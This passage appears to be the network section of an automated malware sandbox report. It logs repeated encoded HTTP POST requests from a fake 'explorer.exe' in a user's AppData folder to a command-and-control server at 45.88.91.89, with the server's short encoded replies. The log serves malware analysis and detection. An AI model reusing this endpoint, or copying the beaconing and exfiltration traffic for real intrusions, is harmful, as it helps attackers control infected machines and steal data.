                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:32:36.736071110 CET344OUTData Raw: 05 05 01 06 06 0c 01 0a 05 06 02 01 02 06 01 07 00 03 05 00 02 02 03 0e 00 01 0a 00 07 05 03 05 0d 55 06 01 07 07 07 52 0d 07 06 03 07 0b 02 02 05 0a 0b 01 0d 0e 04 56 04 52 04 56 07 0b 05 0f 02 53 0d 5b 04 02 05 51 0f 57 0d 05 0f 04 0c 05 06 03
                                                      Data Ascii: URVRVS[QWP\L~kci_tav]bft|lqOc|pO`c^{g{`_ZC{Q`gsZje~V@B{}v~\i
                                                      Dec 13, 2024 14:32:37.474585056 CET25INHTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:32:37.644917011 CET1236INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:32:37 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 35 36 34 0d 0a 56 4a 7d 59 78 7e 7b 02 78 62 56 48 7e 62 78 5e 6a 64 7b 4f 7c 60 7d 4f 7a 70 74 05 7e 5b 73 5d 63 63 75 41 7a 62 65 02 75 48 64 02 7e 61 78 01 55 4b 72 54 74 61 63 4a 7f 4c 71 00 68 77 66 08 78 48 5d 51 7d 63 7c 5a 75 71 7d 4c 74 58 69 47 7f 58 75 58 69 6c 52 0d 69 67 7f 4b 75 66 7b 06 7c 5b 75 02 6a 59 72 5e 78 59 5a 00 78 74 6c 01 79 7d 73 05 7a 5c 7b 5d 78 63 62 06 7f 70 70 07 6c 59 5d 58 69 5c 63 03 76 61 6f 59 7a 51 41 5b 68 59 73 54 7c 4f 6e 52 77 7c 6c 4e 6f 7c 56 46 63 59 61 55 79 5f 7d 03 7c 7c 65 5d 6f 61 66 05 75 60 64 5a 77 72 64 4f 60 4f 5c 50 7e 5d 79 5f 60 5b 7d 01 76 66 70 09 7e 6c 65 00 60 6f 70 04 68 60 7c 07 6f 6f 7c 5a 7b 06 76 44 7c 6d 7c 08 77 64 7c 03 7e 62 62 09 69 6e 6f 0d 7b 0b 61 5f 69 5b 65 04 7b 5d 46 51 6b 42 5e 08 7e 63 68 08 7c 77 53 5c 7b 7d 67 4b 79 72 64 00 7e 62 77 07 7d 77 67 41 68 5e 66 52 6d 60 74 05 7d 04 7b 5b 74 60 61 51 7b 5c 79 4a 75 76 52 00 7e 76 60 07 7d 48 71 0d 74 72 63 06 7c 72 79 01 7f 67 54 0b 7b 58 70 0b 7d 63 7b 01 77 62 6d 41 77 [TRUNCATED]
                                                      Data Ascii: 564VJ}Yx~{xbVH~bx^jd{O|`}Ozpt~[s]ccuAzbeuHd~axUKrTtacJLqhwfxH]Q}c|Zuq}LtXiGXuXilRigKuf{|[ujYr^xYZxtly}sz\{]xcbpplY]Xi\cvaoYzQA[hYsT|OnRw|lNo|VFcYaUy_}||e]oafu`dZwrdO`O\P~]y_`[}vfp~le`oph`|oo|Z{vD|m|wd|~bbino{a_i[e{]FQkB^~ch|wS\{}gKyrd~bw}wgAh^fRm`t}{[t`aQ{\yJuvR~v`}Hqtrc|rygT{Xp}c{wbmAwa}|OP~RxN}YUv_YxLyJ}`qxYRMxwhMxmsKz\x{MrpR{IdI~LQOwaxG~RgH|wdOmvBhxBdHv`zAzqqJ~ljAxOzvMUwqRw_T|`Pw\_weZB|BuwRhBs^{|cx`rDm^AwY^}bf@}SO{CbA}rqNNdB`~`VB}Y~{mUD{rh|_w|g]A~`i@ysR~rlIwcyyOWDvvxJ|fR}fSOwb{Kr[|wXxHt}]Uu\uva}~av}|`@wkuagzbiG}NmywZMxYhy}wzb`K{M~{]NZxt`I~q`_b_R~Bohddkaav`{RdtnyrrZ|oz_z\y\}b`g{ZL~Jx^i]wb}LulB|WtBp|c`I{B{KopbDSkQvdpO}fzSYQfqeSsb[hYwPpkQcSQSNoTJERgHhm|Q^xSSseQxtp}[oZw]}yOia_`}fp}Xa`bhqv]|I~oXh|d{]OrXcbGS}e_Qo_S^dK\bdJQuqz^_Fxw`A{gpOzSwxe|B|ZSZP{@RdQCQZ]YmgzRY[f^g{sXO[UJ_y{{_ccNV}b^RoPVXe_Y`Fq_Z_mXaxr_AZ[K\trsVkoB[po[P`UUU`\TcFcRc`py]bzPAQoa [TRUNCATED]
                                                      Dec 13, 2024 14:32:37.644941092 CET342INData Raw: 4d 79 4b 7d 5a 5d 59 52 05 77 42 5d 60 54 48 56 59 09 59 5a 01 67 47 57 7a 7b 02 61 00 01 53 63 65 7b 05 7b 5a 66 61 7b 5a 44 50 6c 00 6f 4e 50 70 4a 01 62 04 54 43 61 07 76 46 55 62 06 01 53 56 59 76 69 64 03 5f 71 5f 5d 59 63 61 0d 40 57 73 6e
                                                      Data Ascii: MyK}Z]YRwB]`THVYYZgGWz{aSce{{Zfa{ZDPloNPpJbTCavFUbSVYvid_q_]Yca@WsnXuwokkYU@{B~[Q]WuEVc]CT_YQYb\QVdvPcT{_[PlS|_y{{_ccNV}b^RoPlD\pZFbbmXqMkgzp]C[_kWx}vAc`sEh|Zz{|\ocDPqoWXdPRqqRado~b__yw|lxCy]FQiaBV~J
                                                      Dec 13, 2024 14:32:38.491646051 CET308OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 384
                                                      Expect: 100-continue
                                                      Dec 13, 2024 14:32:38.806109905 CET25INHTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:32:38.806293011 CET384OUTData Raw: 53 56 5d 52 56 59 55 51 5b 5f 52 55 59 51 57 52 57 58 5f 58 50 5f 56 59 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: SV]RVYUQ[_RUYQWRWX_XP_VY_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX["9+\&- (?+0?,$'?<3+& !3Y2)A3',$[' \,
                                                      Dec 13, 2024 14:32:39.132133007 CET349INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:32:38 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 39 38 0d 0a 00 1a 24 01 2a 39 27 1f 32 2b 06 57 27 5b 32 03 2a 11 04 06 2e 2f 2b 00 27 1d 28 08 3f 23 39 0c 3d 34 01 5e 2b 23 29 59 20 06 23 08 3a 1c 2f 5f 0d 11 38 5f 22 3e 0f 03 2d 3d 24 02 3d 2d 3e 04 3c 2f 2a 07 2a 2e 27 04 30 05 0c 1e 31 2e 22 57 28 00 23 10 2b 2b 33 05 2c 2c 29 1b 31 0f 2f 57 0d 1e 27 18 28 1c 26 03 23 38 23 00 36 3d 31 59 29 1a 2e 57 20 39 02 02 25 00 25 5a 32 05 3c 1d 20 1d 27 03 27 20 3c 0a 24 00 20 0c 32 05 2e 50 2a 00 29 51 0f 32 54 54 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 98$*9'2+W'[2*./+'(?#9=4^+#)Y #:/_8_">-=$=-></**.'01."W(#++3,,)1/W'(&#8#6=1Y).W 9%%Z2< '' <$ 2.P*)Q2TT0
                                                      Dec 13, 2024 14:32:39.165730953 CET309OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 1456
                                                      Expect: 100-continue
                                                      Dec 13, 2024 14:32:39.480303049 CET25INHTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:32:39.480789900 CET1456OUTData Raw: 53 52 58 5f 56 5e 55 50 5b 5f 52 55 59 58 57 5f 57 5e 5f 5e 50 5e 56 59 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: SRX_V^UP[_RUYXW_W^_^P^VY_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[!^- $.#?<$X33Z;\(7'= %.=3><^;$[' \,"
                                                      Dec 13, 2024 14:32:39.851896048 CET349INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:32:39 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 39 38 0d 0a 00 1a 24 03 28 29 0a 0e 32 2b 33 08 24 2d 36 00 29 59 39 10 2e 3c 2f 06 24 24 06 0c 3f 0a 21 0c 3d 0a 02 07 3e 20 25 5b 23 2f 30 56 39 26 2f 5f 0d 11 3b 07 23 00 22 5c 2d 2d 34 00 29 00 31 59 28 3f 39 1c 3d 3e 0e 12 24 05 08 54 26 2d 3a 54 28 3a 2b 55 3c 28 2c 19 39 2c 32 04 25 1f 2f 57 0d 1e 24 0d 3c 31 25 59 23 16 1d 06 22 13 35 5e 28 37 2e 54 22 39 38 01 26 10 25 5b 25 05 2c 54 34 0d 23 04 31 0d 2b 1f 24 39 05 1f 32 05 2e 50 2a 00 29 51 0f 32 54 54 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 98$()2+3$-6)Y9.</$$?!=> %[#/0V9&/_;#"\--4)1Y(?9=>$T&-:T(:+U<(,9,2%/W$<1%Y#"5^(7.T"98&%[%,T4#1+$92.P*)Q2TT0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      1192.168.2.64975845.88.91.89808088C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:32:38.950464010 CET309OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Dec 13, 2024 14:32:39.297720909 CET2568OUTData Raw: 56 5b 58 5e 53 5e 55 54 5b 5f 52 55 59 5d 57 5a 57 5e 5f 5c 50 5d 56 53 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: V[X^S^UT[_RUY]WZW^_\P]VS_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX["-,,$-#S(4Y$/ W'/ +<$43Z1-5B0>8X;=$[' \,6
                                                      Dec 13, 2024 14:32:40.046741009 CET25INHTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:32:40.301660061 CET200INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:32:39 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      2192.168.2.64976645.88.91.89808088C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:32:41.386358023 CET333OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:32:41.735192060 CET2568OUTData Raw: 56 51 5d 58 56 55 55 5f 5b 5f 52 55 59 5d 57 5c 57 52 5f 5e 50 5c 56 52 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: VQ]XVUU_[_RUY]W\WR_^P\VR_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[!-/+_3>0($#0<?]<'438!^ T#[2%F0> Z--$[' \,6
                                                      Dec 13, 2024 14:32:42.459769964 CET25INHTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:32:42.697562933 CET200INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:32:42 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      3192.168.2.64977145.88.91.89808088C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:32:42.991209030 CET309OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Dec 13, 2024 14:32:43.344552040 CET2568OUTData Raw: 53 57 58 5b 53 5e 55 55 5b 5f 52 55 59 50 57 5d 57 5a 5f 5a 50 5e 56 59 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: SWX[S^UU[_RUYPW]WZ_ZP^VY_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX["9,<$>(?7343Z(<4'5 ($-%F'-#/$[' \,
                                                      Dec 13, 2024 14:32:44.077646017 CET25INHTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:32:44.321846962 CET200INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:32:43 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      4192.168.2.64977545.88.91.89808088C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:32:44.671328068 CET333OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      5192.168.2.64977845.88.91.89808088C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:32:44.981887102 CET333OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 1456
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:32:45.329184055 CET1456OUTData Raw: 56 50 58 5c 56 58 55 55 5b 5f 52 55 59 5e 57 53 57 5b 5f 5e 50 53 56 53 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: VPX\VXUU[_RUY^WSW[_^PSVS_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[":#_38(?4Z0<?$?'+'']) 24&.6$>,$[' \,
                                                      Dec 13, 2024 14:32:46.067620039 CET25INHTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:32:46.301399946 CET349INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:32:45 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 39 38 0d 0a 00 1a 24 03 2b 2a 3f 11 31 05 0d 09 27 2d 21 5e 3d 3f 35 59 2c 3c 37 02 24 42 3c 0d 2b 55 32 1c 29 1a 3c 02 3e 0d 2d 5a 23 2c 2f 0d 3a 36 2f 5f 0d 11 3b 01 23 2e 0b 00 2f 2d 23 12 29 2d 2d 15 3f 3f 1b 5f 3d 2d 20 10 30 02 32 53 26 03 2a 54 28 00 3c 0c 2b 28 30 5b 3a 02 22 04 24 25 2f 57 0d 1e 27 19 29 21 35 1d 20 28 23 07 36 2d 35 5a 29 34 25 0a 20 39 20 03 31 00 3a 07 27 3c 0d 0f 23 1d 20 10 27 33 2f 53 30 5f 2f 56 24 2f 2e 50 2a 00 29 51 0f 32 54 54 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 98$+*?1'-!^=?5Y,<7$B<+U2)<>-Z#,/:6/_;#./-#)--??_=- 02S&*T(<+(0[:"$%/W')!5 (#6-5Z)4% 9 1:'<# '3/S0_/V$/.P*)Q2TT0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      6192.168.2.64977945.88.91.89808088C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:32:45.116075993 CET333OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:32:45.469696045 CET2568OUTData Raw: 56 54 5d 5c 56 5f 55 52 5b 5f 52 55 59 51 57 5f 57 5a 5f 5b 50 5e 56 52 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: VT]\V_UR[_RUYQW_WZ_[P^VR_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[".'$-?S?<3<(V$,Y('<$)Y""#_$-!F%-3,$[' \,
                                                      Dec 13, 2024 14:32:46.235368967 CET25INHTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:32:46.469403028 CET200INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:32:46 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      7192.168.2.64978345.88.91.89808088C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:32:46.719347954 CET309OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Dec 13, 2024 14:32:47.063344002 CET2568OUTData Raw: 56 55 5d 5e 56 5b 50 50 5b 5f 52 55 59 5b 57 52 57 52 5f 52 50 5b 56 5d 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: VU]^V[PP[_RUY[WRWR_RP[V]_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[",?+\&-'+<'/?0?7<+^0;9 2X5B$-8_;=$[' \,.
                                                      Dec 13, 2024 14:32:47.806603909 CET25INHTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:32:48.041188002 CET200INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:32:47 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      8192.168.2.64978745.88.91.89808088C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:32:48.351617098 CET333OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:32:48.703907013 CET2568OUTData Raw: 56 53 5d 52 53 5e 55 56 5b 5f 52 55 59 50 57 59 57 5a 5f 5a 50 53 56 58 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: VS]RS^UV[_RUYPWYWZ_ZPSVX_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[!]-<['>'W</($0?#^<^&(*"2$.0>0Y,-$[' \,
                                                      Dec 13, 2024 14:32:49.436192036 CET25INHTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:32:49.669106960 CET200INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:32:49 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      9192.168.2.64979345.88.91.89808088C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:32:49.928683043 CET333OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:32:50.282066107 CET2568OUTData Raw: 56 5a 58 5e 56 5f 50 55 5b 5f 52 55 59 5f 57 5b 57 5b 5f 52 50 5a 56 58 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: VZX^V_PU[_RUY_W[W[_RPZVX_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[!Z,?7^'3+/<Y$,/3?7?43.4'2>60>[,$[' \,>
                                                      Dec 13, 2024 14:32:51.031677008 CET25INHTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:32:51.278587103 CET200INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:32:50 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      10192.168.2.64979545.88.91.89808088C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
